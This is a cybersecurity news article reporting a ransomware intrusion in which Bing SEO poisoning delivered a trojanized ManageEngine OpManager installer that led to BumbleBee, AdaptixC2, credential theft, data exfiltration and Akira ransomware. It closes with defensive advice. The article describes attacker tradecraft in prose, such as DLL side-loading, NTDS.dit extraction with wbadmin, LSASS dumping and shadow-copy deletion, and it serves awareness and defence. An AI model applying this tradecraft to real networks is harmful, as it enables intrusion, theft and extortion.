Bing Search Results Lead to Akira Ransomware via ManageEngine OpManager
Key Takeaways Threat actors leveraged SEO poisoning on Bing to distribute a malicious installer disguised as ManageEngine OpManager. The attack chain deployed BumbleBee malware and an AdaptixC2...
Key Takeaways
- Threat actors leveraged SEO poisoning on Bing to distribute a malicious installer disguised as ManageEngine OpManager.
- The attack chain deployed BumbleBee malware and an AdaptixC2 beacon, culminating in Akira ransomware across the victim’s network.
- The intrusion involved sophisticated lateral movement, credential theft (including Active Directory database exfiltration), and data theft, with over 75GB exfiltrated.
- The entire operation, from initial compromise to ransomware deployment, took approximately 44 hours.
- This incident highlights the critical need for vigilance against search engine manipulation and robust endpoint security measures.
A sophisticated ransomware attack has been traced back to a seemingly innocuous Bing search for a common IT administration tool. Threat actors exploited search engine optimization (SEO) poisoning to insert a counterfeit download link high in Bing’s results, leading an unsuspecting IT administrator to install malware instead of legitimate software. This incident underscores a growing concern: everyday search activities can inadvertently become the initial vector for a severe network breach.
Table Of Content
The infiltration began in July 2025 when a user initiated a Bing search for “ManageEngine OpManager,” a widely utilized network monitoring solution. Instead of being directed to the official vendor website, the user landed on a meticulously crafted imposter domain. This deceptive site then delivered a trojanized Microsoft Installer (MSI) package, setting in motion a multi-day intrusion that ultimately resulted in the deployment of Akira ransomware throughout the victim’s network.
Detailed analysis of this intrusion was published by The DFIR Report in a report released on June 29, 2026, in collaboration with Swisscom B2B CSIRT. The report identifies BumbleBee malware and an AdaptixC2 beacon as primary tools used by the attackers to maintain persistent access and navigate the compromised environment.
The attackers demonstrated remarkable patience and precision. They established fraudulent administrative accounts, installed remote access software as a Windows service for stealthy persistence, extracted the Active Directory database, and exfiltrated more than 75GB of sensitive data to a server located in Ukraine. The entire sequence, from the initial click on the malicious link to the full-scale ransomware deployment, was executed in approximately 44 hours.
The impact was devastating. The Akira ransomware, identified as locker.exe, utilized Windows Management Instrumentation (WMI) to erase Volume Shadow Copies before encrypting critical systems. To ensure complete network paralysis, the threat actor returned two days later to encrypt a child domain, leaving no segment of the network unaffected.
ManageEngine OpManager Delivers Akira Ransomware
The infection originated from opmanager[.]pro, a fraudulent domain that achieved high visibility in Bing search results through SEO poisoning. This site meticulously mimicked the authentic ManageEngine download page, subsequently redirecting victims to download-center[.]online, where the malicious MSI installer was served to the target machine.
Upon execution, the ManageEngine-OpManager.msi installer dropped three distinct files into a temporary directory: the legitimate OpManager software (acting as a decoy), consent.exe (a standard Windows binary), and the BumbleBee loader, disguised as msimg32.dll. This loader exploited the Windows DLL search order to execute covertly within a trusted process, significantly hindering detection by conventional security solutions.
The MSI package itself was signed with a revoked code-signing certificate issued to “LLC Resource+,” an entity previously linked to BumbleBee malware distribution. The strategic choice to impersonate a ManageEngine installer was deliberate, as IT administrators, who typically manage such tools, possess elevated system privileges, making them prime targets for initial access and broader network compromise.
AdaptixC2, Lateral Movement, and Data Exfiltration
Approximately five hours post-infection, BumbleBee deployed AdgNsy.exe, a renamed version of the legitimate Windows Address Book utility, which was injected with AdaptixC2 shellcode. This established a persistent command-and-control (C2) channel to 172.96.137[.]160, enabling the attacker to commence internal network reconnaissance and identify critical assets, including domain controllers.
The attackers then created two unauthorized domain accounts, backup_DA and backup_EA. Crucially, backup_EA was elevated to the Enterprise Admins group, granting the attackers complete control over the entire Active Directory forest. Subsequently, RustDesk remote access software was installed as a Windows service on multiple servers, ensuring continued access even if other C2 channels were disrupted.
On the second day of the intrusion, the attacker gained access to a domain controller via RDP and extracted the NTDS.dit Active Directory database using wbadmin.exe. Credentials for Veeam were also siphoned from a PostgreSQL database, and LSASS memory was dumped across several hosts. To further evade detection and firewall restrictions, a reverse SSH tunnel was established, routing RDP traffic through an external server.
What You Should Do
- Verify Software Downloads: Always download software directly from official vendor websites. Cross-reference download links and digital signatures before execution.
- Enhance Search Engine Vigilance: Be highly skeptical of search results, especially for critical enterprise software. Look for official domains and scrutinize URLs for subtle typos or unusual top-level domains.
- Implement Strong Endpoint Detection and Response (EDR): Utilize EDR solutions to detect anomalous process behavior, DLL side-loading attempts, and unexpected executable drops.
- Monitor for Rogue Accounts and Privilege Escalation: Implement alerts for the creation of new administrative accounts or unexpected additions to highly privileged groups (e.g., Enterprise Admins, Domain Admins).
- Control MSI Execution: Configure Group Policies or endpoint security to restrict the execution of MSI installers from untrusted or network locations.
- Enforce DLL Load Order Controls: Implement controls to mitigate DLL search order hijacking, preventing malicious DLLs from being loaded by legitimate processes.
- Audit Remote Access Tools: Monitor for the installation or registration of remote access software (like RustDesk) as Windows services, as this is a common persistence mechanism for attackers.
- Regularly Backup and Isolate Data: Maintain regular, immutable backups of critical data, and ensure these backups are stored offline or in isolated environments to prevent ransomware encryption.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.